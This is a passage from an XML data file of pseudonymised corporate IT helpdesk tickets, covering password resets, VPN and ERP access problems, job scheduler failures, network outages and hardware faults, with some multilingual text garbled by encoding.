  </r>
  <r>
    <s v="atp are available at delivery plant plant_283, but order items cannot get confirmed at the same day. "/>
    <s v="from yesterday, we found that some order items can only be confirmed in future(not same day with order entry) even there are full atp available at delivery plant plant_283. csrs got many calls from customers to have them manually generate dn for their orders. _x000d__x000a__x000d__x000a_here are some example, please check:_x000d__x000a__x000d__x000a_35988706_x000d__x000a_24870388 #20 &amp; #30_x000d__x000a_35989571 #10_x000d__x000a_35994606 #10_x000d__x000a__x000d__x000a_"/>
    <s v="cwhyboek axljywpf"/>
    <x v="5"/>
  </r>
  <r>
    <s v="hello, i'm lbxgodfu usperhki from company italy. i've vpn profile is not working"/>
    <s v="hello, i'm lbxgodfu usperhki from company italy. i've vpn profile is not working_x000a_can you please verify ? my user is : piolfghim_x000a_"/>
    <s v="lbxgodfu usperhki"/>
    <x v="0"/>
  </r>
  <r>
    <s v="netweaver - "/>
    <s v="_x000d__x000a__x000d__x000a_received from: bcxpeuko.utorqehx@gmail.com_x000d__x000a__x000d__x000a_hello it team,_x000d__x000a_please help me to update the netweaver as i am receiving the below message._x000d__x000a__x000d__x000a_[cid:image001.png@01d20923.e7e007d0]_x000d__x000a__x000d__x000a_"/>
    <s v="bcxpeuko utorqehx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="policy ?"/>
    <s v="_x000d__x000a__x000d__x000a_received from: hbmwlprq.ilfvyodx@gmail.com_x000d__x000a__x000d__x000a_please forward to pc support_x000d__x000a_it seems that there is a policy in place, that automatically adds websites to the list of sites, that should be viewed in &quot;compatibilty mode&quot;. this is a setting in internet explorer._x000d__x000a_i would like to have this policy to be disabled, at least do not automatically add &quot;company.com&quot;, &quot;company.com&quot; and &quot;company.com&quot;_x000d__x000a__x000d__x000a_[cid:image001.png@01d208f1.b6a23530]_x000d__x000a__x000d__x000a_mit freundlichem gruÃŸ / kind "/>
    <s v="hbmwlprq ilfvyodx"/>
    <x v="38"/>
  </r>
  <r>
    <s v="babiluntr"/>
    <s v="_x000d__x000a__x000d__x000a_received from: dhtxwcng.hruckmey@gmail.com_x000d__x000a__x000d__x000a_[cid:image001.png@01d208ef.f2293b00]_x000d__x000a__x000d__x000a_viele grÃ¼ÃŸe / best "/>
    <s v="dhtxwcng hruckmey"/>
    <x v="28"/>
  </r>
  <r>
    <s v="outlook is not opening"/>
    <s v="name:ilypdtno mkdfetuq_x000d__x000a_language:_x000d__x000a_browser:microsoft internet explorer_x000d__x000a_email:ilypdtno.mkdfetuq@gmail.com_x000d__x000a_customer number:_x000d__x000a_telephone:_x000d__x000a_summary:outlook is not opening"/>
    <s v="ilypdtno mkdfetuq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_2049 failed in job_scheduler at: 09/07/2016 04:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2049 failed in job_scheduler at: 09/07/2016 04:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="network outage : pol-poland site hard down since 9/7/2016 3:36 am et. no backup circuit."/>
    <s v="what type of outage:  ___x__network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   _________ 9/7/2016 3:36 am et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____na__     (yes/no/na) _x000d__x000a__x000d__x000a_7. site contact notified (phone/email) ?  __no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job Job_512 failed in job_scheduler at: 09/07/2016 03:46:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_512 failed in job_scheduler at: 09/07/2016 03:46:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="pls. unlock &amp; reset windows &amp; erp account for user vvtghjscha"/>
    <s v="pls. unlock &amp; reset windows &amp; erp account for user vvtghjscha"/>
    <s v="vwpxjtof vmidzswj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="install win7 \ewew8323546 \sgnubadl gpkovbah"/>
    <s v="install win7 \ewew8323546 \sgnubadl gpkovbah"/>
    <s v="sgnubadl gpkovbah"/>
    <x v="24"/>
  </r>
  <r>
    <s v="install win7 \ewew8323545 \sgnubadl gpkovbah"/>
    <s v="install win7 \ewew8323545 \sgnubadl gpkovbah"/>
    <s v="sgnubadl gpkovbah"/>
    <x v="24"/>
  </r>
  <r>
    <s v="install win7 \ewew8323506 \vzqomdgt jwoqbuml"/>
    <s v="install win7 \ewew8323506 \vzqomdgt jwoqbuml"/>
    <s v="vzqomdgt jwoqbuml"/>
    <x v="24"/>
  </r>
  <r>
    <s v="install win7 \ewew8323504 \vzqomdgt jwoqbuml"/>
    <s v="install win7 \ewew8323504 \vzqomdgt jwoqbuml"/>
    <s v="vzqomdgt jwoqbuml"/>
    <x v="24"/>
  </r>
  <r>
    <s v="performance improvement/tuning "/>
    <s v="performance improvement/tuning for machine summary &amp; load list"/>
    <s v="ejpvuxrg tryaibcx"/>
    <x v="40"/>
  </r>
  <r>
    <s v="account locked out and password reset "/>
    <s v="account locked out and password reset "/>
    <s v="gljkfidc kelctrpf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="collaboration_platform é‡Œé¢æ‰“å¼€&quot;æŸ¥çœ‹æˆ‘çš„æ‰€æœ‰åº”ç”¨&quot;ç½‘ç«™é¡µé¢ä¸èƒ½æ˜¾ç¤ºã€‚"/>
    <s v="collaboration_platform é‡Œé¢æ‰“å¼€&quot;æŸ¥çœ‹æˆ‘çš„æ‰€æœ‰åº”ç”¨&quot;é¡µé¢ä¸èƒ½æ˜¾ç¤ºã€‚"/>
    <s v="lkrfndev kztlojin"/>
    <x v="31"/>
  </r>
  <r>
    <s v="EU_tool not working"/>
    <s v="the well-established work orders has been reported with &quot;system to a standstill.&quot; it can be assumed then the machine operator no longer contracts. normal maintenance jobs without stopping the machine are imported."/>
    <s v="oinlxfak ojlyanhs"/>
    <x v="25"/>
  </r>
  <r>
    <s v="please unlock &amp;  reset windows password for dfrt user kreghtmph"/>
    <s v="please unlock &amp; reset windows password for dfrt user kreghtmph"/>
    <s v="vwpxjtof vmidzswj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="HostName_53 -  f:\ label:dat2-HostName_53 d4e35b72  is over 85% space consumed. space available: 0.97 m"/>
    <s v="HostName_53 -  f:\ label:dat2-HostName_53 d4e35b72 on server: HostName_53 is over 85% space consumed. space available: 0.97 m"/>
    <s v="spxqmiry zpwgoqju"/>
    <x v="11"/>
  </r>
  <r>
    <s v="impacts awards password"/>
    <s v="_x000d__x000a__x000d__x000a_received from: gqwdslpc.clhgpqnb@gmail.com_x000d__x000a__x000d__x000a_please reset my impacts awards password._x000d__x000a__x000d__x000a_i am not remember even security question also._x000d__x000a__x000d__x000a__x000d__x000a_[cid:image003.jpg@01d20900.0a6e3390]_x000d__x000a__x000d__x000a__x000d__x000a_best "/>
    <s v="omLHxJVE PYudFZBW"/>
    <x v="0"/>
  </r>
  <r>
    <s v="circuit outage : usa - (company) vpn router is down since 02:01 am et on 09/07. primary is up."/>
    <s v="what type of outage:  _____network     __x___circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____slo_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   _________02:01 am et on 09/07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    (yes/no/na) _x000d__x000a__x000d__x000a_6. backup circuit active ?   ____yes____     (yes/no/na) _x000d__x000a__x000d__x000a_7. site contact notified (phone/email) ?  ___no______     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   ______na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pls help to create delivery note for sto 4908087268"/>
    <s v="_x000d__x000a__x000d__x000a_received from: gjtyswkb.dpvaymxr@gmail.com_x000d__x000a__x000d__x000a_dear it,_x000d__x000a__x000d__x000a_would you pls help to create delivery note for sto 5019198379, for something error we unable to create, "/>
    <s v="gjtyswkb dpvaymxr"/>
    <x v="5"/>
  </r>
  <r>
    <s v="companysecure  user can't get into the network"/>
    <s v="_x000a__x000a_received from: ctzykflo.evzbhgru@gmail.com_x000a__x000a_dear all,_x000a__x000a_we have a problem that our new sales rep for 1202, rbzymfvx lebqthwv (kujfgtats), personnel # 156604998 can't get into the network companysecure._x000a_can you please check his settings â€“ you can call him on mobile _x000a__x000a_"/>
    <s v="ctzykflo evzbhgru"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp bex hana issue"/>
    <s v="system (SID_34, SID_37, SID_39, SID_38, hrp, other ?):_x000a__x000a_enter user id of user having the issue: dofghbmes_x000a__x000a_transaction code(s) the user needs or was working with:_x000a__x000a_describe the issue:_x000a_the launcher was not able to connect analysis add-in. make sure that analysis add-in is not disabled by office application!_x000a__x000a__x000a_if you are getting a &quot;not authorized&quot; message, recreate the condition then do   /nsu53   and attach result to the ticketing_tool ticket._x000a__x000a_provide access the same as this other user:"/>
    <s v="lmwohkbd ucziatex"/>
    <x v="0"/>
  </r>
  <r>
    <s v="network outage : engineering_toolkuznetsk warehouse russia site hard down since 1:52 am et on 09/07."/>
    <s v="what type of outage:  ___x__network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ______no___     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   __________1:52 am et on 09/07.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__no___     (yes/no/na) _x000d__x000a__x000d__x000a_7. site contact notified (phone/email) ?  _____no____     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   ______na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windows account locked "/>
    <s v="windows account locked "/>
    <s v="ajnwuxiy gbhcdlkr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job HostName_1019fail failed in job_scheduler at: 09/07/2016 01:48:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job HostName_1019fail failed in job_scheduler at: 09/07/2016 01:48:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_1386 failed in job_scheduler at: 09/07/2016 00:35:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1386 failed in job_scheduler at: 09/07/2016 00:35:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="ebhsm004 -  e:\ label:dat1-ebhsm004 dc16126c  is over 85% space consumed. space available: 4.6 g"/>
    <s v="ebhsm004 -  e:\ label:dat1-ebhsm004 dc16126c on server: ebhsm004 is over 85% space consumed. space available: 4.6 g"/>
    <s v="spxqmiry zpwgoqju"/>
    <x v="65"/>
  </r>
  <r>
    <s v="laptop service tag- fh1r262 not working(keypad issue)"/>
    <s v="_x000d__x000a__x000d__x000a_received from: mzdkgnvs.svhkgyqb@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a__x000d__x000a_i have a dell 7350 2 in 1 laptop, the system number is:aiul9912366_x000d__x000a_when i plug in my laptop to the keypad, the whole system is shutting down,_x000d__x000a_and with the screen docked in to the keybankrd i am unable to start the computer._x000d__x000a_when i tried charging , it is not doing so with the screen docked in._x000d__x000a_i am currently using the touch pad of the screen, and charging only the screen._x000d__x000a_the keypad is totally unresponsive._x000d__x000a_please help out._x000d__x000a_my user name is :rajy_x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="mzdkgnvs svhkgyqb"/>
    <x v="18"/>
  </r>
  <r>
    <s v="only mouse is not working in system"/>
    <s v="only mouse is not working in system"/>
    <s v="munxvfhw texsbopi"/>
    <x v="18"/>
  </r>
  <r>
    <s v="job Job_1329 failed in job_scheduler at: 09/07/2016 00:11:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1329 failed in job_scheduler at: 09/07/2016 00:11:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="error while extending mm#"/>
    <s v="from: kbyivdfz zwutmehy [mailto:kbyivdfz.zwutmehy@gmail.com] _x000a_sent: wednesday, september 07, 2016 7:28 am_x000a_to: nwfodmhc exurcwkm_x000a_subject: rad:error while extending mm#_x000a__x000a_hello,_x000a__x000a_need to extend existing mm# 6427895 from plant plant_165 to plant_206._x000a__x000a_during processing mm01, the error message pop up &quot;material group should start with 'r' or 'd' for roh type.&quot;_x000a_however the system doesn't allow me to change material group._x000a__x000a_ _x000a__x000a_*--.--.--.--.--.--.--.--.--.--.--.-the enormity of humanity / mankind is being insensitive-.--.*_x000a__x000a_æ ªå¼ä¼šç¤¾ã‚¨ã‚¯ã‚¹ãƒ„ãƒ«ãƒ¼ãƒ‰ãƒ›ãƒ¼ãƒ³_x000a_è³¼è²·æ‹…å½“ æœ‰è³€äº®å¹³_x000a__x000a_kbyivdfz zwutmehy_x000a_purchasing/buyer_x000a_company k.k._x000a__x000a_kbyivdfz.zwutmehy@gmail.com_x000a__x000a__x000a__x000a_"/>
    <s v="kbyivdfz zwutmehy"/>
    <x v="29"/>
  </r>
  <r>
    <s v="unable to login to supply_chain_software"/>
    <s v="unable to login to supply_chain_software_x000d__x000a_please reset the password "/>
    <s v="qftpazns fxpnytmk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="wrench_engineering_tool macro issue"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ucdwyxko.apktrsyq@gmail.com_x000d__x000a__x000d__x000a_&quot;we are unable to run a macro which is used to open an excel/word file in solidworks after skype updation (since 24.02.2016)._x000d__x000a_this macro is working fine in system where skype is not installed._x000d__x000a__x000d__x000a_kindly resolve the issue at the earliest&quot;._x000d__x000a__x000d__x000a__x000d__x000a_with best "/>
    <s v="ucdwyxko apktrsyq"/>
    <x v="18"/>
  </r>
  <r>
    <s v="phone email "/>
    <s v="_x000a__x000a_received from: baoapacg.wanrtyg@company.com_x000a__x000a_"/>
    <s v="rekpvblc ufysatml"/>
    <x v="0"/>
  </r>
  <r>
    <s v="babiluntr"/>
    <s v="_x000d__x000a__x000d__x000a_received from: blktuiae.jzakfmhw@gmail.com_x000d__x000a__x000d__x000a_my licence  for babiluntr will expire in 30 days_x000d__x000a__x000d__x000a_please update this to use it more_x000d__x000a__x000d__x000a_"/>
    <s v="blktuiae jzakfmhw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="pls help to reset the password for this erp id: tempuser."/>
    <s v="pls help to reset the password for this id: tempuser."/>
    <s v="lckagtry xcrmzgli"/>
    <x v="19"/>
  </r>
  <r>
    <s v="walkmeåŠ è½½æ•…éšœ"/>
    <s v="walkmeä¸‹è½½å®‰è£…åŽï¼ŒæŒ‰é’®ä¸èƒ½åœ¨æµè§ˆå™¨ç•Œé¢æ˜¾çŽ°"/>
    <s v="whflryeb fatgdzhq"/>
    <x v="47"/>
  </r>
  <r>
    <s v="ç”µè„‘å¼€æœºæ•…éšœ"/>
    <s v="åŽŸææ–™ä»“åº“ç”µè„‘å¼€æœºè“å±ï¼Œä¸»æœºé¢æ¿3ã€4æŒ‡ç¤ºç¯æŠ¥è­¦"/>
    <s v="ycjxrsba ehftdorm"/>
    <x v="47"/>
  </r>
  <r>
    <s v="gas station telephone line disconnection "/>
    <s v="gas station telephone line disconnection "/>
    <s v="hdqfgbei rnybhzve"/>
    <x v="31"/>
  </r>
  <r>
    <s v="å¼€ä¸äº†æœº"/>
    <s v="å¼€ä¸äº†æœºï¼Œæ˜¾ç¤ºç³»ç»Ÿåäº†ã€‚"/>
    <s v="kclhqspo xvugztyc"/>
    <x v="30"/>
  </r>
  <r>
    <s v="im locked out of erp agian"/>
    <s v="name:sndaofyw jetcxpda_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:vichtyuky.warhtyonack@company.com_x000a_customer number:_x000a_telephone:_x000a_summary:im locked out of erp agian"/>
    <s v="sndaofyw jetcxpda"/>
    <x v="0"/>
  </r>
  <r>
    <s v="user needs help with extended monitor projection."/>
    <s v="user needs help with extended monitor projection._x000d__x000a_-connected to the user system using teamviewer._x000d__x000a_-help the user witrh the extended monitor projection._x000d__x000a_-issue resolved."/>
    <s v="qftpazns fxpnytmk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ess login issue"/>
    <s v="ess login issue_x000d__x000a_-verified user details.(employee# &amp; manager name)_x000d__x000a_-checked the user name in ad _x000d__x000a_-advised the user to login and check._x000d__x000a_-caller confirmed that she was able to login._x000d__x000a_-issue resolved."/>
    <s v="bcxfhekz bplfrnis"/>
    <x v="0"/>
  </r>
  <r>
    <s v="global_telecom_1 broadband"/>
    <s v="_x000a__x000a_received from: vnetbgio.lqxztben@gmail.com_x000a__x000a_hi,_x000a__x000a_not sure where to direct this. i was told to contact the help desk because my global_telecom_1 broadband isn't working when trying to use my laptop from a remote location._x000a__x000a_am i in the right place?_x000a__x000a_davidthd rofghach_x000a_channel partner sales engineer_x000a_vnetbgio.lqxztben@gmail.com&lt;mailto:vnetbgio.lqxztben@gmail.com&gt;_x000a__x000a__x000a__x000a__x000a_"/>
    <s v="vnetbgio lqxztben"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to complete forecast"/>
    <s v="unable to complete forecast_x000a__x000a_jochegtyhu is on vacation_x000a__x000a_can you help me?_x000a__x000a_fnqelwpk ahrskvln_x000a_regional manager latin amerirtca_x000a_fnqelwpk.ahrskvln@gmail.com_x000a__x000a_from: fnqelwpk ahrskvln _x000a_sent: tuesday, september 6, 2016 2:42 pm_x000a_to: ftnijxup sbltduco &lt;ftnijxup.sbltduco@gmail.com&gt;_x000a_subject: help with scm_software_x000a__x000a_jochegtyhu, _x000a__x000a_how are you?_x000a__x000a_what does this mean? what can i do to complete my forecast?_x000a__x000a_ _x000a__x000a_fnqelwpk ahrskvln_x000a_regional manager latin amerirtca_x000a_fnqelwpk.ahrskvln@gmail.com_x000a_"/>
    <s v="fnqelwpk ahrskvln"/>
    <x v="67"/>
  </r>
  <r>
    <s v="issues logging in to skype after recently changing my password"/>
    <s v="name:obanjrhg rnafleys_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:obanjrhg.rnafleys@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:issues logging in to skype after recently changing my password"/>
    <s v="obanjrhg rnafleys"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp access issue"/>
    <s v="system (SID_34, SID_37, SID_39, SID_38, hrp, other ?): SID_9 - pi uacyltoe hxgaycze system_x000a__x000a_enter user id of user having the issue: vvgtycargvc_x000a__x000a_please restart password, its blocked._x000a_"/>
    <s v="lokiwfhg udkoqrcg"/>
    <x v="19"/>
  </r>
  <r>
    <s v="job Job_2063d failed in job_scheduler at: 09/06/2016 15:53:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2063d failed in job_scheduler at: 09/06/2016 15:53:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="vip 2 -when i try to access the ethics training link i receive an error message: error #2001, organization code not found."/>
    <s v="this happens if i log in via public internet as well as internet + vpn."/>
    <s v="dxyvfuhr uyfqgomx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="user having issues login in to the pc with the new password."/>
    <s v="user having issues login in to the pc with the new password._x000d__x000a_-connected to the user system using teamviewer._x000d__x000a_-help the user login using the new password._x000d__x000a_-help the user login to the company vpn and sync the new password to the company network._x000d__x000a_-help the user login to both the outlook and skype._x000d__x000a_-issue resolved."/>
    <s v="zaxjnqoh jyxewlav"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update for ticket_no0437735"/>
    <s v="ticket update for ticket_no0437735"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to log in to erp SID_34"/>
    <s v="unable to log in to erp SID_34"/>
    <s v="thwinauz ulzkaqnc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="global erp crm:  please investigate why agbighyail espinosa's employee account in erp crm is not recognized as an employee"/>
    <s v="hello,_x000a__x000a_it please advise the status on the below request._x000a__x000a_hi nafghyncy,_x000a__x000a_agbighyail espinosa appears to be an active employee.  after all, she entered a bunch of sales orders in erp ecc over the last few days.  yet there is a central block on her employee account in erp crm so that it does not show up in the search results when we search for employee accounts using &quot;role is employee&quot;.  unless you already know the reason for this, would you please check with hr why her account has a central block on it?  it seems like it could possibly be an error._x000a__x000a__x000a_gracias / "/>
    <s v="aqtcmxuf kuxsnimy"/>
    <x v="14"/>
  </r>
  <r>
    <s v="engineering request 2248675 assignment (revise component)"/>
    <s v="engineering request 2248675 assignment (revise component) has been completed but cannot be deleted from my workflow. "/>
    <s v="tqrlikex moxaebfq"/>
    <x v="10"/>
  </r>
  <r>
    <s v="unable to log in to supply_chain_software"/>
    <s v="unable to log in to supply_chain_software"/>
    <s v="fnqelwpk ahrskvln"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ethics undeliverable e-mails"/>
    <s v="good morning,_x000d__x000a__x000d__x000a_please review and advise on these &quot;undeliverable&quot; e-mail addresses.  _x000d__x000a__x000d__x000a_"/>
    <s v="crkdjbot qiztrxne"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need to activate new iphone"/>
    <s v="need to activate new iphone"/>
    <s v="ombjicdy rlfbovdq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="report not running properly and delivering results to dataloads-app"/>
    <s v="bex report is producing a report with 0 size instead of proper reporting.  xsdb_o20_db_credits is supposed to run on the 2nd of each month along with 3 other dashbankrd reports but for the last couple of months the report has been empty.  this has happened previously but only with the credits and not any of the 3 other reports.  please correct so it is available for next month.  this is for a global dashbankrd that is used in some areas for compensation.  "/>
    <s v="qtiyzjaw rxtpbqvu"/>
    <x v="8"/>
  </r>
  <r>
    <s v="unable to access travel site"/>
    <s v="unable to access travel site "/>
    <s v="mnsejpby xsrdtvkw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset via password_management_tool password manager"/>
    <s v="password reset via password_management_tool password manager"/>
    <s v="tjlgzkbp iervwjzg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to post document to SID_34"/>
    <s v="unable to post document to SID_34 using spreadsheet. "/>
    <s v="kslhobgj cyhvefna"/>
    <x v="9"/>
  </r>
  <r>
    <s v="erp access issue"/>
    <s v="system (SID_34, SID_37, SID_39, SID_38, hrp, other ?): SID_2_x000d__x000a__x000d__x000a_enter user id of user having the issue: vvgtycargvc_x000d__x000a__x000d__x000a__x000d__x000a_&quot;user account not in validity date&quot;"/>
    <s v="lokiwfhg udkoqrcg"/>
    <x v="19"/>
  </r>
  <r>
    <s v="password re-set"/>
    <s v="_x000d__x000a__x000d__x000a_received from: zenjimdghtybo.xirzfpob@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a__x000d__x000a_please re-set mu login password for attendance_tool._x000d__x000a__x000d__x000a__x000d__x000a_[cid:image001.jpg@01d2088d.049859f0]_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_with best "/>
    <s v="zenjimbo xirzfpob"/>
    <x v="0"/>
  </r>
  <r>
    <s v="delivery failures"/>
    <s v="material # 7359351_x000d__x000a_location: plant_33_x000d__x000a_sto # 5019195083_x000d__x000a_product available. cannot create delivery."/>
    <s v="koqntham sqiuctfl"/>
    <x v="5"/>
  </r>
  <r>
    <s v="my password is invalid. can you help me. thanks."/>
    <s v="my password is invalid. can you help me. "/>
    <s v="jclrangd kjlnearz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="computer not booting into windows"/>
    <s v="touchpad and usb mouse not working _x000d__x000a__x000d__x000a_computer not booting into windows"/>
    <s v="qkprzfew poliamdb"/>
    <x v="2"/>
  </r>
  <r>
    <s v="user has a new personal device for activation without the approval form."/>
    <s v="user has a new personal device for activation without the approval form._x000d__x000a_-advised the user to forward the approval form to activate the company  email on personal device."/>
    <s v="ombjicdy rlfbovdq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update for inc1548457 "/>
    <s v="ticket update for inc1548457 "/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update for ticket_no0437326"/>
    <s v="ticket update for ticket_no0437326"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="windows zdsxmcwu thdjzolw"/>
    <s v="windows zdsxmcwu thdjzolw"/>
    <s v="tjcpbliu eaiovlqh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login to distributor_tool with new password and view saved customers details  "/>
    <s v="unable to login to distributor_tool with new password and view saved customers details  "/>
    <s v="fwvrsdly dzjnkayq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account unlock"/>
    <s v="account unlock"/>
    <s v="pdvjanwx oprdiygs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset passwords for yolktfas fyoxqgvh using password_management_tool password reset."/>
    <s v="the"/>
    <s v="yolktfas fyoxqgvh"/>
    <x v="16"/>
  </r>
  <r>
    <s v="expense reports submissions in my workflow"/>
    <s v="_x000a__x000a_received from: sbvlxuwm.yanbikrx@gmail.com_x000a__x000a_according to oneteam, jashyht mkuhtyhui (6566632) and qjeymnzs wgpelvyn (6456967) are part of my team now. however, their exepsne report submissions are not coming to my workflow for approval. please look into this and advise._x000a__x000a_"/>
    <s v="sbvlxuwm yanbikrx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="terminated user called for access to the hub"/>
    <s v="terminated user called for access to the hub"/>
    <s v="olckhmvx pcqobjnd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vip2: sim card locked for the company provided phone"/>
    <s v="vip2: sim card locked for the company provided phone"/>
    <s v="ipmlkwce plhtfsqo"/>
    <x v="28"/>
  </r>
  <r>
    <s v="dob report showing blank data for yzugpdco nsyapewg"/>
    <s v="this report was working up until september 3rd. now it shows no data when laurent opens the report within reporting_tool (browser)._x000d__x000a__x000d__x000a_report link used is as follows:_x000d__x000a_#/site/certified_content/views/dailyorderbillingreport/mtd-ctry?:iid=3 _x000d__x000a__x000d__x000a_output is per attached._x000d__x000a__x000d__x000a_"/>
    <s v="kyzhcsrq fwyltvpd"/>
    <x v="8"/>
  </r>
  <r>
    <s v="the dynamics crm url checks is reporting a : down status on, company-crm-sp-mfg_tooltion.azurewebsites.net. please investigat"/>
    <s v="observing below alert in monitoring_tool since 10:50 am on 09/06 et:_x000d__x000a__x000d__x000a_application &quot;dynamics crm url checks&quot; on node &quot;company-crm-sp-mfg_tooltion.azurewebsites.net&quot; is down "/>
    <s v="jloygrwh acvztedi"/>
    <x v="59"/>
  </r>
  <r>
    <s v="need adobe flash player installed on the pc"/>
    <s v="need adobe flash player installed on the pc"/>
    <s v="wznkpjis rantlypb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="drucker ag71 in fÃ¼rth"/>
    <s v="_x000a__x000a_received from: osjqfbvw.hlmgrfpx@gmail.com_x000a__x000a_hallo,_x000a__x000a_unser netzwerkdrucker ag71 hÃ¶rt nicht mehr auf zu drucken._x000a_ein â€žgast&quot; scheint versehentlich immer neue druckauftrÃ¤ge zu generieren bzw. laut service techniker vom hersteller hp ist wohl ein spool auftrag im netz gespeichert â€“ wir kÃ¶nnen die druckauftrÃ¤ge nicht sehen, nachverfolgen oder stoppen._x000a__x000a_alle versuche, die druckauftrÃ¤ge abzubrechen, sind fehlgeschlagen, auch ein ziehen des steckers oder des lan-kabels nÃ¼tzt nichts._x000a__x000a_wer kann helfen?_x000a_laut hp sollte das der administrator kÃ¶nnen._x000a__x000a_danke._x000a__x000a_gabryltke schÃ¼tt_x000a_human resources_x000a_osjqfbvw.hlmgrfpx@gmail.com&lt;mailto:osjqfbvw.hlmgrfpx@gmail.com&gt;_x000a__x000a__x000a_company shared services gmbh_x000a_geschÃ¤ftsfÃ¼hrer: phvkowml azbtkqwx, naruedlk mpvhakdq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osjqfbvw hlmgrfpx"/>
    <x v="28"/>
  </r>
  <r>
    <s v="unable to login to pc after changing the password "/>
    <s v="unable to login to pc after changing the password "/>
    <s v="xgtyasdp xniowugc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="delivery due list created no delivery note for sto e.g. aw mm#4586645 sto#5019195160- plant_3, please forward to srinfhyath "/>
    <s v="deliver due list ews1 is multiple times running on daily basis. sometimes ddl does not create delivery notes from sto, even though material is available and shipping date overdue. _x000d__x000a_1. check why ddl did not select sto 5019195160_x000d__x000a_2. check what sto are overdue _x000d__x000a_3. adjust ddl _x000d__x000a_4. keep user informed about your result. _x000d__x000a_many "/>
    <s v="qgopxabz xnuieqjr"/>
    <x v="17"/>
  </r>
  <r>
    <s v="circuit outage: vogelfontein, south africa , sa mpls circuit is down at 10:51 am et on 06/09. site is up on vpn circuit."/>
    <s v="what type of outage:  _____network     __x___circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    _____no____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   _______10:51 am et on 06/09___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__yes__    (yes/no/na) _x000d__x000a__x000d__x000a_6. backup circuit active ?   ______yes__     (yes/no/na) _x000d__x000a__x000d__x000a_7. site contact notified (phone/email) ?  _________     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   _____na______   (yes/no/na) _x000d__x000a__x000d__x000a_9. equipment reset ?    ___na________    (yes/no/na) _x000d__x000a__x000d__x000a_10. verified site working on backup circuit ?  _____yes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unable to connect to vpn"/>
    <s v="unable to connect to vpn"/>
    <s v="yrhnxpvi drlbzqpi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="mobile device activation - personally owned samsung s7"/>
    <s v="tom called in to get the device activated. please find the mobility agreement attached."/>
    <s v="mxotdywa veycbhgu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="windows password reset"/>
    <s v="windows password reset"/>
    <s v="pdvjanwx oprdiygs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="7350 - 2nd battery not charging"/>
